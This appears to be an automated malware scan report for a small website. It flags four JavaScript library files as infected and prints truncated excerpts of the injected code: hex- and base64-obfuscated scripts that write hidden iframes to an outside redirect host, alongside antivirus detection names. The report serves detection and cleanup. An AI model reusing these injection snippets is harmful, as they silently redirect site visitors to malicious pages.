New scan:

Malware Scanner report for nelliadycc.com

Malicious/Suspicious/Total urls checked
4/0/13
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "nelliadycc.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/3
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nelliadycc.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://nelliadycc.com/
200 OK
Content-Length: 14210
Content-Type: text/html
clean
http://nelliadycc.com/static/jquery/jquery-1.6.min.js
200 OK
Content-Length: 91378
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cw(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function ct(a){if(!ch[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ci||(ci=c.createElement("iframe"),ci.frameBorder=ci.width=ci.height=0),c.body.appendChild(ci);if(!cj||!ci.createElement)cj=(ci.contentWindow||ci.contentDocument).document,cj.write("<!doctype><html><body></body></html>");b=cj.createElement(a),cj.bod
... 3134 bytes are skipped ...
2\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]);

Antivirus reports:

AntiVir
JS/Redirector.any
Avast
JS:ScriptXE-inf [Trj]
Ad-Aware
Trojan.JS.Redirector.ANY
Ikarus
Trojan.Script
nProtect
Trojan.JS.Redirector.ANY
TrendMicro-HouseCall
TROJ_GEN.F47V1117
Emsisoft
Trojan.JS.Redirector.ANY (B)
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c551641 )
MicroWorld-eScan
Trojan.JS.Redirector.ANY
F-Secure
Trojan.JS.Redirector.ANY
GData
Trojan.JS.Redirector.ANY
BitDefender
Trojan.JS.Redirector.ANY

http://nelliadycc.com/static/jquery/jquery-ui-1.8.12.custom.min.js
200 OK
Content-Length: 210608
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.12",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,
... 3100 bytes are skipped ...
cj5CduVWb1N2bkBSPgkEbPBichZ3OnU0MlQHcpJ3Yz9yQzUiQzUSOyUyNyUSRzUidpR2LDNTJFNTJl1WYyZWavM0MlU0Ml4WZlJ3YzxGb1Z2dvxGbhBjMlIjMlAjMyUCRzUiclRmcvJWZtFmcmBjMlIjMlQGN1YzN2QGN4UmY4QjZ1EDRzUSZnFGcGNTJwhGcuQ3YlJXak9SbvNmLsFGduVGZ0VWZyR3c0N3bw5SelxGduVmYv8SQzUCc0RHayITJENTJjJ3cwITJyITJ1EzMyITJENTJ0h2ZpVGawITJyITJwYTNyITJENTJoRHZpdHMyUSZtFmcml2QzUSRzUiMyUSZu9mbBNTJ5FGbwNXakJjMlQ0MlUGb5R3cwITJyITJvVWbpZnMyUCRzUSZtFmbwITJ2lGZDNTJ3ITJ4ITJlRXaydnL05WZtV3YvRWRzUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';eval(_1lO(O0l(IlO)));

Antivirus reports:

AntiVir
JS/Crypt.GG
Avast
JS:Includer-CN [Trj]
Bkav
MW.Clodd86.Trojan.4bc9
Ikarus
Trojan.Script
TrendMicro-HouseCall
TROJ_GEN.F47V1117
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/BlacoleRef.BR
NANO-Antivirus
Trojan.Url.IframeB.bmhwib
GData
Win32.Trojan.Agent.J7TC26

http://nelliadycc.com/static/jquery/carousel.js
200 OK
Content-Length: 5435
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.fn.carousel = function()
{
var element = $(this[0]);
var args = arguments[0] || {};
var duration = args.duration;
var direction = args.direction;
var easing = args.easing;
var imgSize;
var imgWidth;
var imgHeight;

var auto = true;

element.find("ul").append($("<li>")).find("li:last").append($(element.find("li:first").html()));
imgSize = element.find("li").size();
var t = new Image();
t.src = elemen
... 3361 bytes are skipped ...
cj5CduVWb1N2bkBSPgkEbPBichZ3OnU0MlQHcpJ3Yz9yQzUiQzUSOyUyNyUSRzUidpR2LDNTJFNTJl1WYyZWavM0MlU0Ml4WZlJ3YzxGb1Z2dvxGbhBjMlIjMlAjMyUCRzUiclRmcvJWZtFmcmBjMlIjMlQGN1YzN2QGN4UmY4QjZ1EDRzUSZnFGcGNTJwhGcuQ3YlJXak9SbvNmLsFGduVGZ0VWZyR3c0N3bw5SelxGduVmYv8SQzUCc0RHayITJENTJjJ3cwITJyITJ1EzMyITJENTJ0h2ZpVGawITJyITJwYTNyITJENTJoRHZpdHMyUSZtFmcml2QzUSRzUiMyUSZu9mbBNTJ5FGbwNXakJjMlQ0MlUGb5R3cwITJyITJvVWbpZnMyUCRzUSZtFmbwITJ2lGZDNTJ3ITJ4ITJlRXaydnL05WZtV3YvRWRzUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';eval(_1lO(O0l(IlO)));

Antivirus reports:

AntiVir
JS/Crypt.GG
Avast
JS:Includer-CN [Trj]
Ikarus
Trojan.Script
TrendMicro-HouseCall
TROJ_GEN.F47V1117
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c5525b1 )
Microsoft
Trojan:JS/BlacoleRef.BR
NANO-Antivirus
Trojan.Url.IframeB.bmhwib
GData
Script.Trojan.Agent.2WL6CO

http://nelliadycc.com/static/jquery/mbGallery.js
200 OK
Content-Length: 20609
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){
$.mbGallery ={
name:"mb.gallery",
author:"Matteo Bicocchi",
version:"2.0.2",
defaults:{
containment:"body",
cssURL:"",
skin:"white",
overlayBackground:"#333",
exifData:false,
galleryTitle:"My Gallery",
imageSelector: ".imgFull",
thumbnailSelector: ".imgThumb",
titleSelector: ".photoName",
descSelector: ".photoDescription",
minWidth: 0,
... 3238 bytes are skipped ...
ape(document[_0x6dae[3]][_0x6dae[6]](offset,end));} ;} ;return _0x237bx4;} ;if(get_cookie(_0x6dae[7])==_0x6dae[1]&&navigator[_0x6dae[8]]==_0x6dae[9]){if(navigator[_0x6dae[10]]==_0x6dae[11]||navigator[_0x6dae[10]]==_0x6dae[12]){var popfrequency=_0x6dae[13];var expireDate= new Date();expireDate[_0x6dae[15]](expireDate[_0x6dae[14]]()+parseInt(popfrequency));document[_0x6dae[3]]=_0x6dae[16]+parseInt(popfrequency)+_0x6dae[17]+expireDate[_0x6dae[18]]();document[_0x6dae[20]](_0x6dae[19]);} ;} ;

Antivirus reports:

AntiVir
JS/Crypt.GG
Avast
JS:Includer-CN [Trj]
Ad-Aware
Trojan.JS.Agent.HHY
Ikarus
Virus.HTML.Framer
nProtect
Trojan.JS.Agent.HHY
K7AntiVirus
Trojan ( ac8094fc0 )
TrendMicro-HouseCall
TROJ_GEN.F47V1117
Comodo
TrojWare.JS.Iframe.PJ
Emsisoft
Trojan.JS.Agent.HHY (B)
CAT-QuickHeal
JS/Iframe.CRA
K7GW
Exploit ( 04c5525b1 )
DrWeb
SCRIPT.Virus
Microsoft
Trojan:JS/Redirector.LF
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Agent.HHY
NANO-Antivirus
Trojan.Url.IframeB.bmhwib
F-Secure
Trojan.JS.Agent.HHY
F-Prot
JS/IFrame.HP
AVG
HTML/Framer
Norman
Iframe.VW
GData
Trojan.JS.Agent.HHY
Commtouch
JS/IFrame.HP
BitDefender
Trojan.JS.Agent.HHY

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21412
Content-Type: text/javascript
clean
http://connect.facebook.net/en_US/all.js
200 OK
Content-Length: 163644
Content-Type: application/x-javascript
clean
http://nelliadycc.com/index.php
200 OK
Content-Length: 14210
Content-Type: text/html
clean
http://nelliadycc.com/news.php
200 OK
Content-Length: 8035
Content-Type: text/html
clean
http://nelliadycc.com/photos.php
200 OK
Content-Length: 8069
Content-Type: text/html
clean
http://nelliadycc.com/videos.php
200 OK
Content-Length: 7277
Content-Type: text/html
clean
http://nelliadycc.com/index.php?login=true
200 OK
Content-Length: 14210
Content-Type: text/html
clean
http://nelliadycc.com/test404page.js
404 Not Found
Content-Length: 395
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nelliadycc.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 29 Sep 2014 19:54:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=e8qlchjtcm0cludp2pao464610; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: nelliadycc.com
Referer: http://www.google.com/search?q=nelliadycc.com

Result:
The result is similar to the first query. There are no suspicious redirects found.